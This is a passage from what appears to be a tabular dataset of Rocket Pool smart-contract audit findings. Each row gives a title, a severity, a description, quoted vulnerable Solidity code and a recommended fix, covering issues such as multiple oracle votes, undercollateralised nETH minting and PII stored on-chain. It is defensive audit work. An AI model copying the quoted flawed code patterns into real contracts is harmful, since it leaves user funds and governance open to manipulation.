(calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nSubmitting a block's network balances:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n updateBalances(\\_block, \\_totalEth, \\_stakingEth, \\_rethSupply);\\n}\\n```\\n\\nSubmitting a block's RPL price information:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n","Resolution\\nThis issue has been fixed in PR https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/204 by introducing a public method that allows anyone to manually trigger a DAO consensus threshold check and a subsequent balance update in case the issue's example scenario occurs.\\nThe conditional check and update of price feed information, Minipool state transition, etc., should be externalized into a separate public function. This function is also called internally in the existing code. In case the DAO gets into the scenario above, anyone can call the function to trigger a reevaluation of the condition with updated membership numbers and thus get the process unstuck.",,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n" +Trusted/Oracle-Nodes can vote multiple times for different outcomes,medium,"Trusted/oracle nodes submit various ETH2 observations to the RocketPool contracts. When 51% of nodes submitted the same observation, the result is stored in the contract. However, while it is recorded that a node already voted for a specific minipool (being withdrawable & balance) or block (price/balance), a re-submission with different parameters for the same minipool/block is not rejected.\\nSince the oracle values should be distinct, clear, and there can only be one valid value, it should not be allowed for trusted nodes to change their mind voting for multiple different outcomes within one block or one minipool\\n`RocketMinipoolStatus` - a trusted node can submit multiple different results for one minipool\\nNote that `setBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, _minipoolAddress)), true);` is recorded but never checked. (as for the other two instances)\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.count"", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n\\n`RocketNetworkBalances` - a trusted node can submit multiple different results for the balances at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""network.balances.submitted.node"", msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""network.balances.submitted.count"", \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""network.balances.submitted.node"", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit balances submitted event\\nemit BalancesSubmitted(msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply, block.timestamp);\\n// Check submission count & update network balances\\n```\\n\\n`RocketNetworkPrices` - a trusted node can submit multiple different results for the price at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""network.prices.submitted.node"", msg.sender, \\_block, \\_rplPrice));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""network.prices.submitted.count"", \\_block, \\_rplPrice));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""network.prices.submitted.node"", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit prices submitted event\\nemit PricesSubmitted(msg.sender, \\_block, \\_rplPrice, block.timestamp);\\n// Check submission count & update network prices\\n```\\n",Only allow one vote per minipool/block. Don't give nodes the possibility to vote multiple times for different outcomes.,,"```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.count"", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n" +RocketTokenNETH - Pot. discrepancy between minted tokens and deposited collateral,medium,"The `nETH` token is paid to node operators when minipool becomes withdrawable. `nETH` is supposed to be backed by `ETH` 1:1. However, in most cases, this will not be the case.\\nThe `nETH` minting and deposition of collateral happens in two different stages of a minipool. `nETH` is minted in the minipool state transition from `Staking` to `Withdrawable` when the trusted/oracle nodes find consensus on the fact that the minipool became withdrawable (submitWinipoolWithdrawable).\\n```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nWhen consensus is found on the state of the `minipool`, `nETH` tokens are minted to the `minipool` address according to the withdrawal amount observed by the trusted/oracle nodes. At this stage, `ETH` backing the newly minted `nETH` was not yet provided.\\n```\\nuint256 nodeAmount = getMinipoolNodeRewardAmount(\\n minipool.getNodeFee(),\\n userDepositBalance,\\n minipool.getStakingStartBalance(),\\n minipool.getStakingEndBalance()\\n);\\n// Mint nETH to minipool contract\\nif (nodeAmount > 0) { rocketTokenNETH.mint(nodeAmount, \\_minipoolAddress); }\\n```\\n\\nThe `nETH` token contract now holds more `nETH.totalsupply` than actual `ETH` collateral. It is out of sync with the `ETH` reserve and therefore becomes undercollateralized. This should generally be avoided as the security guarantees that for every `nETH` someone deposited, `ETH` does not hold. However, the newly minted `nETH` is locked to the `minipoolAddress`, and the minipool has no means of redeeming the `nETH` for `ETH` directly (via nETH.burn()).\\nThe transition from Withdrawable to `Destroyed` the actual collateral for the previously minted `nETH` (still locked to minipoolAddress) is provided by the `Eth2` withdrawal contract. There is no specification for the withdrawal contract as of now. Still, it is assumed that some entity triggers the payout for the `Eth2` rewards on the withdrawal contract, which sends the amount of `ETH` to the configured withdrawal address (the minipoolAddress).\\nThe `minipool.receive()` function receives the `ETH`\\n```\\nreceive() external payable {\\n (bool success, bytes memory data) = getContractAddress(""rocketMinipoolDelegate"").delegatecall(abi.encodeWithSignature(""receiveValidatorBalance()""));\\n if (!success) { revert(getRevertMessage(data)); }\\n}\\n```\\n\\nand forwards it to `minipooldelegate.receiveValidatorBalance`\\n```\\nrequire(msg.sender == rocketDAOProtocolSettingsNetworkInterface.getSystemWithdrawalContractAddress(), ""The minipool's validator balance can only be sent by the eth1 system withdrawal contract"");\\n// Set validator balance withdrawn status\\nvalidatorBalanceWithdrawn = true;\\n// Process validator withdrawal for minipool\\nrocketNetworkWithdrawal.processWithdrawal{value: msg.value}();\\n```\\n\\nWhich calculates the `nodeAmount` based on the `ETH` received and submits it as collateral to back the previously minted `nodeAmount` of `nETH`.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n// Set withdrawal processed status\\nrocketMinipoolManager.setMinipoolWithdrawalProcessed(msg.sender);\\n// Transfer node balance to nETH contract\\nif (nodeAmount > 0) { rocketTokenNETH.depositRewards{value: nodeAmount}(); }\\n// Transfer user balance to rETH contract or deposit pool\\n```\\n\\nLooking at how the `nodeAmount` of `nETH` that was minted was calculated and comparing it to how `nodeAmount` of `ETH` is calculated, we can observe the following:\\nthe `nodeAmount` of `nETH` minted is an absolute number of tokens based on the rewards observed by the trusted/oracle nodes. the `nodeAmount` is stored in the storage and later used to calculate the collateral deposit in a later step.\\nthe `nodeAmount` calculated when depositing the collateral is first assumed to be a `nodeShare` (line 47), while it is actually an absolute number. the `nodeShare` is then turned into a `nodeAmount` relative to the `ETH` supplied to the contract.\\nDue to rounding errors, this might not always exactly match the `nETH` minted (see https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/26).\\nThe collateral calculation is based on the `ETH` value provided to the contract. If this value does not exactly match what was reported by the oracle/trusted nodes when minting `nETH`, less/more collateral will be provided.\\nNote: excess collateral will be locked in the `nETH` contract as it is unaccounted for in the `nETH` token contract and therefore cannot be redeemed.\\nNote: providing less collateral will go unnoticed and mess up the 1:1 `nETH:ETH` peg. In the worst case, there will be less `nETH` than `ETH`. Not everybody will be able to redeem their `ETH`.\\nNote: keep in mind that the `receive()` function might be subject to gas restrictions depending on the implementation of the withdrawal contract (.call() vs. .transfer())\\nThe `nETH` minted is initially uncollateralized and locked to the `minipoolAddress`, which cannot directly redeem it for `ETH`. The next step (next stage) is collateralized with the staking rewards (which, as noted, might not always completely add up to the minted nETH). At the last step in `withdraw()`, the `nETH` is transferred to the `withdrawalAddress` of the minipool.\\n```\\nuint256 nethBalance = rocketTokenNETH.balanceOf(address(this));\\nif (nethBalance > 0) {\\n // Get node withdrawal address\\n RocketNodeManagerInterface rocketNodeManager = RocketNodeManagerInterface(getContractAddress(""rocketNodeManager""));\\n address nodeWithdrawalAddress = rocketNodeManager.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer\\n require(rocketTokenNETH.transfer(nodeWithdrawalAddress, nethBalance), ""nETH balance was not successfully transferred to node operator"");\\n // Emit nETH withdrawn event\\n emit NethWithdrawn(nodeWithdrawalAddress, nethBalance, block.timestamp);\\n}\\n```\\n\\nSince the `nETH` initially minted can never take part in the `nETH` token market (as it is locked to the minipool address, which can only transfer it to the withdrawal address in the last step), the question arises why it is actually minted early in the lifecycle of the minipool. At the same time, it could as well be just directly minted to `withdrawalAddress` when providing the right amount of collateral in the last step of the minipool lifecycle. Furthermore, if `nETH` is minted at this stage, it should be questioned why `nETH` is actually needed when you can directly forward the `nodeAmount` to the `withdrawalAddress` instead of minting an intermediary token that is pegged 1:1 to `ETH`.\\nFor reference, `depositRewards` (providing collateral) and `mint` are not connected at all, hence the risk of `nETH` being an undercollateralized token.\\n```\\nfunction depositRewards() override external payable onlyLatestContract(""rocketNetworkWithdrawal"", msg.sender) {\\n // Emit ether deposited event\\n emit EtherDeposited(msg.sender, msg.value, block.timestamp);\\n}\\n\\n// Mint nETH\\n// Only accepts calls from the RocketMinipoolStatus contract\\nfunction mint(uint256 \\_amount, address \\_to) override external onlyLatestContract(""rocketMinipoolStatus"", msg.sender) {\\n // Check amount\\n require(\\_amount > 0, ""Invalid token mint amount"");\\n // Update balance & supply\\n \\_mint(\\_to, \\_amount);\\n // Emit tokens minted event\\n emit TokensMinted(\\_to, \\_amount, block.timestamp);\\n}\\n```\\n","It looks like `nETH` might not be needed at all, and it should be discussed if the added complexity of having a potentially out-of-sync `nETH` token contract is necessary and otherwise remove it from the contract system as the `nodeAmount` of `ETH` can directly be paid out to the `withdrawalAddress` in the `receiveValidatorBalance` or `withdraw` transitions.\\nIf `nETH` cannot be removed, consider minting `nodeAmount` of `nETH` directly to `withdrawalAddress` on `withdraw` instead of first minting uncollateralized tokens. This will also reduce the gas footprint of the Minipool.\\nEnsure that the initial `nodeAmount` calculation matches the minted `nETH` and deposited to the contract as collateral (absolute amount vs. fraction).\\nEnforce that `nETH` requires collateral to be provided when minting tokens.",,"```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n" +RocketMiniPoolDelegate - on destroy() leftover ETH is sent to RocketVault where it cannot be recovered,medium,"When destroying the `MiniPool`, leftover `ETH` is sent to the `RocketVault`. Since `RocketVault` has no means to recover “unaccounted” `ETH` (not deposited via depositEther), funds forcefully sent to the vault will end up being locked.\\n```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(""rocketVault"")));\\n}\\n```\\n",Implement means to recover and reuse `ETH` that was forcefully sent to the contract by `MiniPool` instances.,,"```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(""rocketVault"")));\\n}\\n```\\n" +RocketDAO - personally identifiable member information (PII) stored on-chain Acknowledged,medium,"Like a DAO user's e-mail address, PII is stored on-chain and can, therefore, be accessed by anyone. This may allow de-pseudonymize users (and correlate Ethereum addresses to user email addresses) and be used for spamming or targeted phishing campaigns putting the DAO users at risk.\\nrocketpool-go-2.5-Tokenomics/dao/trustednode/dao.go:L173-L183\\n```\\n// Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n\\n```\\nfunction getMemberEmail(address \\_nodeAddress) override public view returns (string memory) {\\n return getString(keccak256(abi.encodePacked(daoNameSpace, ""member.email"", \\_nodeAddress))); \\n}\\n```\\n",Avoid storing PII on-chain where it is readily available for anyone.,,"```\\n// Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n" +RocketPoolMinipool - should check for address(0x0),medium,"The two implementations for `getContractAddress()` in `Minipool/Delegate` are not checking whether the requested contract's address was ever set before. If it were never set, the method would return `address(0x0)`, which would silently make all delegatecalls succeed without executing any code. In contrast, `RocketBase.getContractAddress()` fails if the requested contract is not known.\\nIt should be noted that this can happen if `rocketMinipoolDelegate` is not set in global storage, or it was cleared afterward, or if `_rocketStorageAddress` points to a contract that implements a non-throwing fallback function (may not even be storage at all).\\nMissing checks\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n\\nChecks implemented\\n```\\nfunction getContractAddress(string memory \\_contractName) internal view returns (address) {\\n // Get the current contract address\\n address contractAddress = getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n // Check it\\n require(contractAddress != address(0x0), ""Contract not found"");\\n // Return\\n return contractAddress;\\n}\\n```\\n",Resolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by changing requiring that the contract address is not `0x0`.\\nSimilar to `RocketBase.getContractAddress()` require that the contract is set.,,"```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n" +RocketDAONodeTrustedAction - ambiguous event emitted in actionChallengeDecide,low,"`actionChallengeDecide` succeeds and emits `challengeSuccess=False` in case the challenged node defeats the challenge. It also emits the same event if another node calls `actionChallengeDecided` before the refute window passed. This ambiguity may make a defeated challenge indistinguishable from a challenge that was attempted to be decided too early (unless the component listening for the event also checks the refute window).\\n```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n",Avoid ambiguities when emitting events. Consider throwing an exception in the else branch if the refute window has not passed yet (minimal gas savings; it's clear that the call failed; other components can rely on the event only being emitted if there was a decision.,,"```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n" +"RocketDAOProtocolProposals, RocketDAONodeTrustedProposals - unused enum ProposalType",low,"The enum `ProposalType` is defined but never used.\\n```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n\\n```\\nenum ProposalType {\\n Setting // Change a DAO setting (Node operator min/max fees, inflation rate etc)\\n}\\n```\\n",Remove unnecessary code.,,"```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n" +RocketDaoNodeTrusted - Unused events,low,"The `MemberJoined` `MemberLeave` events are not used within `RocketDaoNodeTrusted`.\\n```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n",Consider removing the events. Note: `RocketDAONodeTrustedAction` is emitting `ActionJoin` and `ActionLeave` event.s,,"```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n" +"RocketDAOProposal - expired, and defeated proposals can be canceled",low,"The `RocketDAOProposal.getState` function defaults a proposal's state to `ProposalState.Defeated`. While this fallback can be considered secure, the remaining code does not perform checks that prevent defeated proposals from changing their state. As such, a user can transition a proposal that is `Expired` or `Defeated` to `Cancelled` by using the `RocketDAOProposal.cancel` function. This can be used to deceive users and potentially bias future votes.\\nThe method emits an event that might trigger other components to perform actions.\\n```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n\\n```\\nfunction cancel(address \\_member, uint256 \\_proposalID) override public onlyDAOContract(getDAO(\\_proposalID)) {\\n // Firstly make sure this proposal that hasn't already been executed\\n require(getState(\\_proposalID) != ProposalState.Executed, ""Proposal has already been executed"");\\n // Make sure this proposal hasn't already been successful\\n require(getState(\\_proposalID) != ProposalState.Succeeded, ""Proposal has already succeeded"");\\n // Only allow the proposer to cancel\\n require(getProposer(\\_proposalID) == \\_member, ""Proposal can only be cancelled by the proposer"");\\n // Set as cancelled now\\n setBool(keccak256(abi.encodePacked(daoProposalNameSpace, ""cancelled"", \\_proposalID)), true);\\n // Log it\\n emit ProposalCancelled(\\_proposalID, \\_member, block.timestamp);\\n}\\n```\\n","Preserve the true outcome. Do not allow to cancel proposals that are already in an end-state like `canceled`, `expired`, `defeated`.",,"```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n" +RocketDAOProposal - preserve the proposals correct state after expiration,low,"The state of proposals is resolved to give a preference to a proposal being `expired` over the actual result which may be `defeated`. The preference for a proposal's status is checked in order: `cancelled? -> executed? -> `expired`? -> succeeded? -> pending? -> active? -> `defeated` (default)`\\n```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n",consider checking for `voteAgainst` explicitly and return `defeated` instead of `expired` if a proposal was `defeated` and is queried after expiration. Preserve the actual proposal result.,,"```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n" +RocketRewardsPool - registerClaimer should check if a node is already disabled before decrementing rewards.pool.claim.interval.claimers.total.next,low,"The other branch in `registerClaimer` does not check whether the provided `_claimerAddress` is already disabled (or invalid). This might lead to inconsistencies where `rewards.pool.claim.interval.claimers.total.next` is decremented because the caller provided an already deactivated address.\\nThis issue is flagged as `minor` since we have not found an exploitable version of this issue in the current codebase. However, we recommend safeguarding the implementation instead of relying on the caller to provide sane parameters. Registered Nodes cannot unregister, and Trusted Nodes are unregistered when they leave.\\n```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, ""Claimer is already registered"");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.contract.registered.block"", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n","Ensure that `getClaimingContractUserRegisteredBlock(contractName, _claimerAddress)` returns `!=0` before decrementing the `.total.next`.",,"```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, ""Claimer is already registered"");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.contract.registered.block"", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n" +RocketNetworkPrices - Price feed update lacks block number sanity check,low,"Trusted nodes submit the RPL price feed. The function is called specifying a block number and the corresponding RPL price for that block. If a DAO vote goes through for that block-price combination, it is written to storage. In the unlikely scenario that a vote confirms a very high block number such as `uint(-1)`, all future price updates will fail due to the `require` check below.\\nThis issue becomes less likely the more active members the DAO has. Thus, it's considered a minor issue that mainly affects the initial bootstrapping process.\\n```\\n// Check block\\nrequire(\\_block > getPricesBlock(), ""Network prices for an equal or higher block are set"");\\n```\\n","The function's `_block` parameter should be checked to prevent large block numbers from being submitted. This check could, e.g., specify that node operators are only allowed to submit price updates for a maximum of x blocks ahead of `block.number`.",,"```\\n// Check block\\nrequire(\\_block > getPricesBlock(), ""Network prices for an equal or higher block are set"");\\n```\\n" +RocketDepositPool - Potential gasDoS in assignDeposits Acknowledged,low,"`assignDeposits` seems to be a gas heavy function, with many external calls in general, and few of them are inside the for loop itself. By default, `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` returns `2`, which is not a security concern. Through a DAO vote, the settings key `deposit.assign.maximum` can be set to a value that exhausts the block gas limit and effectively deactivates the deposit assignment process.\\n```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n","The `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` return value could be cached outside the loop. Additionally, a check should be added that prevents unreasonably high values.",,```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n +RocketNetworkWithdrawal - ETH dust lockup due to rounding errors,low,There's a potential `ETH` dust lockup when processing a withdrawal due to rounding errors when performing a division.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount 